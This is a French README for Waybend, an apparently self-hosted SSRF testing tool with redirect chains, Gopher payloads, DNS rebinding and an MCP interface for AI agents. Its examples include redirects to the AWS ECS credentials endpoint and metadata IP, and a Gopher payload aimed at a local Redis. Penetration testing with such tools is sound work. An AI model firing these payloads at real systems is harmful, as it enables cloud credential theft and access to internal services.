
Atelier auto-hébergé pour les redirections SSRF, les payloads, les callbacks et le DNS
Infrastructure SSRF auto-hébergée pour les chaînes de redirection, les charges utiles de protocole exactes, les callbacks, le DNS rebinding et les preuves de requêtes. Un seul binaire Rust fournit l'atelier web, l'API JSON, le répondeur DNS faisant autorité et l'interface MCP stdio.
Installez avec Homebrew :
brew install principlebreach/tap/waybend
Les versions étiquetées publient également des binaires signés pour Linux, macOS et Windows sur
la page des versions, ainsi qu'un
conteneur multiplateforme sur ghcr.io/principlebreach/waybend.
Compilez depuis les sources avec Rust 1.88 ou une version plus récente :
git clone https://github.com/PrincipleBreach/waybend.git
cd waybend
cargo build --release --locked
waybend init waybend.yml
waybend validate --config waybend.yml
waybend serve --config waybend.yml
Ouvrez http://localhost:8080. Chaque entrée du catalogue affiche à la fois l'URL Waybend
prête à copier et sa cible finale exacte :
Waybend URL http://localhost:8080/r/aws-ecs-v2?token=case-17
Final target http://169.254.170.2/v2/credentials/
Utilisez Docker Compose pour un déploiement local persistant :
cp waybend.example.yml waybend.yml
docker compose up --build -d
Consultez Premiers pas pour les conteneurs, les binaires natifs, la validation et le premier test de redirection.
Le catalogue couvre les métadonnées cloud, les formes d'adresses loopback et de réseau privé, les différences d'analyseurs d'URL, les cibles de fichiers locaux et les routes Gopher encadrées par protocole. La frontière protocolaire et les références principales sont documentées dans Charges utiles de protocole.
Recherchez ou exportez le catalogue sans démarrer de serveur :
waybend catalog --config waybend.yml --query metadata
waybend catalog --config waybend.yml --category internal-service --format csv
Construisez une redirection dynamique préservant les octets :
waybend encode --config waybend.yml --status 307 --hops 2 \
'Gopher://127.0.0.1:6379/_INFO%0D%0APING'
Corrélez une route avec ?token=<value>, puis interrogez ses observations :
waybend evidence --config waybend.yml list --token case-17 --json
Exécutez waybend --help ou waybend <command> --help pour la surface de commandes
installée.
Démarrez le serveur MCP en entrée/sortie standard :
waybend mcp --config /absolute/path/to/waybend.yml
Il expose search_payloads, get_payload, build_redirect,
dns_rebind_name et list_evidence. La
compétence Waybend guide un agent pour sélectionner un ensemble
de charges utiles ciblé, préserver les octets de protocole, réutiliser un jeton de corrélation et rapporter
les preuves observées.
Consultez Intégration d'agent pour la configuration du client MCP, les schémas d'outils et l'installation de la compétence.
Déléguez une zone à Waybend, activez le DNS et publiez à la fois les ports UDP et TCP 53. Les noms de requête encodent un comportement statique, alterné ou TOCTOU déterministe :
127-0-0-1.static.rb.example.com
198-51-100-10.127-0-0-1.alt.rb.example.com
198-51-100-10.169-254-169-254.2.toctou.rb.example.com
Préfixez un nom avec t-<token>. pour joindre les preuves DNS et HTTP. Consultez
DNS rebinding pour la délégation, l'encodage IPv6 et les règles de séquence.
Lisez CONTRIBUTING.md. Signalez les vulnérabilités via SECURITY.md.
MIT — voir LICENSE.
Créé par Principle Breach — recherche en sécurité offensive.